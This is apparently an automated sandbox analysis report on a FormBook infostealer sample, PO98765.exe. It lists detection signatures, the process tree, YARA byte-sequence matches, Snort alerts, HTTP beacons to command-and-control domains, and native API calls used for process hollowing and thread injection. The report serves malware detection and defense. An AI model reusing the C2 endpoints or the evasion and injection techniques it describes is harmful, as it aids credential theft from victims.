Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO98765.exe

Overview

General Information

Sample Name:PO98765.exe
Analysis ID:323082
MD5:137ec800f9c49390f2f225ab22774443
SHA1:2f3f1a1615b625cb1daf8d1e4a3eba208a89e30d
SHA256:60263179eccb843c5aa38040ebd2483b29a3923a94987f006561488e5d0f1d96
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO98765.exe (PID: 484 cmdline: 'C:\Users\user\Desktop\PO98765.exe' MD5: 137EC800F9C49390F2F225AB22774443)
    • PO98765.exe (PID: 2440 cmdline: C:\Users\user\Desktop\PO98765.exe MD5: 137EC800F9C49390F2F225AB22774443)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6024 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5068 cmdline: /c del 'C:\Users\user\Desktop\PO98765.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO98765.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO98765.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO98765.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        1.2.PO98765.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.PO98765.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO98765.exeVirustotal: Detection: 14%Perma Link
          Source: PO98765.exeReversingLabs: Detection: 10%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.PO98765.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 4x nop then jmp 05BA779Ch
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49709
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.4:49712
          Source: global trafficHTTP traffic detected: GET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz HTTP/1.1Host: www.westhighlandwaytours.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz HTTP/1.1Host: www.bloochy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /sbmh/?4hLtM4=7c1Yf2hXTdqRFKk5H17xFHcZtn6ZaViryhouZ8x83IEcsjPhhroi25cpiHSX6hk8gWCa&n0DXRn=xPJxZNG0xPz HTTP/1.1Host: www.westhighlandwaytours.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz HTTP/1.1Host: www.bloochy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.westhighlandwaytours.com
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000002.924230430.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.701874161.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041A050 NtClose,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00419F20 NtCreateFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00419FD0 NtReadFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00419FCA NtReadFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0151A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01519610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015196D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0514AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0514A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0514A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0514B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0514A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05149A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8A050 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C89FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C89F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C89FCA NtReadFile,
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_0266B264
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_0266C2B0
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_02669998
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_0266DF73
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BA17B0
